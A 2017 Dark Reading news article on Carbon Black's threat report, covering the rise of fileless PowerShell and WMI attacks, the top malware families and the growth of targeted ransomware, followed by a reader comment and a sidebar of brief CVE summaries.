Perimeter

12/21/2017
12:00 PM
50%
50%

Fileless Malware Attacks Hit Milestone in 2017

Non-malware attacks account for the majority of all attacks this year, and ransomware grows to a $5 billion industry, new data shows.

Fileless malware attacks using PowerShell or Windows Management Instrumentation (WMI) tools accounted for 52% of all attacks this year, beating out malware-based attacks for the first time, according to Carbon Black's 2017 Threat Report.

"Attackers will use whatever is the cheapest and most effective method," says Rick McElroy, security strategist for Carbon Black, explaining the shift to fileless malware from malware-based attacks.

Fileless malware attacks, also known as non-malware attacks, allow cybercriminals to skip steps that are needed to deploy malware-based attacks, such as creating payloads with malware to drop onto users' systems. Instead, attackers use trusted programs native to the operating system and native operating system tools like PowerShell and WMI to exploit in-memory access, as well as Web browsers and Office applications.

Fileless attacks have been around since 2014, and surged last year as attackers became enamored with in-memory attacks and sought to perfect their malicious craft. That trend continued this year, with a 6.8% growth in monthly fileless attacks targeting Carbon Black's protected endpoints.

All types of attacks – both malware-based and fileless - grew 13% per month overall this year, according to the report.

Kryptik, Strictor, Nemucod, Emotet, and Skeeyah were the five top malware families this year, according to the report. And the top three industries hit this year by malware authors included finance, healthcare, and retail.

Ransomware 

Ransomware soared to a $5 billion industry this year, Cybersecurity Ventures reports. And that is up from $850 million in the previous year, according to Carbon Black's report.

"Both the volume of attacks and amount per attack were up," McElroy says. "But it was also the crazy value of Bitcoin that increased it to $5 billion."

Cybercriminals often demand ransom payments in Bitcoin, which has seen a sharp rise in value this year. According to CoinDesk, a single Bitcoin now carries a value of approximately $16,000, compared to January when it was $1,000 per coin.

Ransomware authors targeted the technology industry, followed by the government and non-profit sector, and legal industry, according to the report. The top five ransomware families in 2017 included Spora, Cryptxxx/Exxroute, Locky, Cerber, and Genasom.

In the future, Carbon Black expects the trend toward targeted ransomware attacks to increase. That feeling is shared by a growing number of research firms. Earlier this year, a handful of targeted attacks emerged that focused on specific industries, geographies, or company size, as cybercriminals seek a better return on investment, security experts says.

Cybercriminals are expanding beyond ransomware "spray and pray" attacks delivered by spam. Patrick Wheeler, director of threat intelligence for Proofpoint, says spray and pray campaigns were designed to infect as many machines as possible with the expectation that a certain percentage of the victims would pay the ransom.

Anton Ivanov, lead malware analyst with Kaspersky Lab, says ransomware will mostly involve targeted campaigns in the future because attackers know they can get more money with this method.

Financial organizations, higher-education institutions, and healthcare, manufacturing, and technology companies, are some of the industries that have been hit this year with targeted ransomware campaigns.

Carbon Black's McElroy says ransomware authors are also expected to increasingly focus on Linux systems, because that is the operating system used by a large percentage of enterprises. In addition, ransomware authors will also be able to increase their mobile reach, McElroy adds.

The Android operating system found in a large percentage of smartphones and tablets across the globe uses a flavor of Linux, McElroy notes.

Related Content:

Dawn Kawamoto is an Associate Editor for Dark Reading, where she covers cybersecurity news and trends. She is an award-winning journalist who has written and edited technology, management, leadership, career, finance, and innovation stories for such publications as CNET's ... View Full Bio

Comment  | 
Print  | 
More Insights
Comments
Newest First  |  Oldest First  |  Threaded View
alphaa10
50%
50%
alphaa10,
User Rank: Strategist
1/23/2018 | 4:46:58 AM
Windows Broken
If we held a contest to see which lemming would be first to leap from a cliff, we can rest assured all would leap at the opportunity. If Windows users find the analogy distasteful, they did not read the memo, years ago, from a Microsoft executive who said, "Windows is just not designed for security."

Of course, it is easy to understand, none thinks his own Windows installation will be hit, and most act as though they simply do not care-- at least, until they do meet disaster.

But how remarkable that after at least 20 years of security crises of major and growing proportions with Windows, high-profile, relatively high-value Windows installations continue as a preferred target for any attacker.

 
WSJ Report: Facebook Breach the Work of Spammers, Not Nation-State Actors
Curtis Franklin Jr., Senior Editor at Dark Reading,  10/19/2018
6 Security Trends for 2018/2019
Curtis Franklin Jr., Senior Editor at Dark Reading,  10/15/2018
6 Reasons Why Employees Violate Security Policies
Ericka Chickowski, Contributing Writer, Dark Reading,  10/16/2018
Register for Dark Reading Newsletters
White Papers
Video
Cartoon
Current Issue
Flash Poll
The Risk Management Struggle
The Risk Management Struggle
The majority of organizations are struggling to implement a risk-based approach to security even though risk reduction has become the primary metric for measuring the effectiveness of enterprise security strategies. Read the report and get more details today!
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2018-10839
PUBLISHED: 2018-10-16
Qemu emulator <= 3.0.0 built with the NE2000 NIC emulation support is vulnerable to an integer overflow, which could lead to buffer overflow issue. It could occur when receiving packets over the network. A user inside guest could use this flaw to crash the Qemu process resulting in DoS.
CVE-2018-13399
PUBLISHED: 2018-10-16
The Microsoft Windows Installer for Atlassian Fisheye and Crucible before version 4.6.1 allows local attackers to escalate privileges because of weak permissions on the installation directory.
CVE-2018-18381
PUBLISHED: 2018-10-16
Z-BlogPHP 1.5.2.1935 (Zero) has a stored XSS Vulnerability in zb_system/function/c_system_admin.php via the Content-Type header during the uploading of image attachments.
CVE-2018-18382
PUBLISHED: 2018-10-16
Advanced HRM 1.6 allows Remote Code Execution via PHP code in a .php file to the user/update-user-avatar URI, which can be accessed through an "Update Profile" "Change Picture" (aka user/edit-profile) action.
CVE-2018-18374
PUBLISHED: 2018-10-16
XSS exists in the MetInfo 6.1.2 admin/index.php page via the anyid parameter.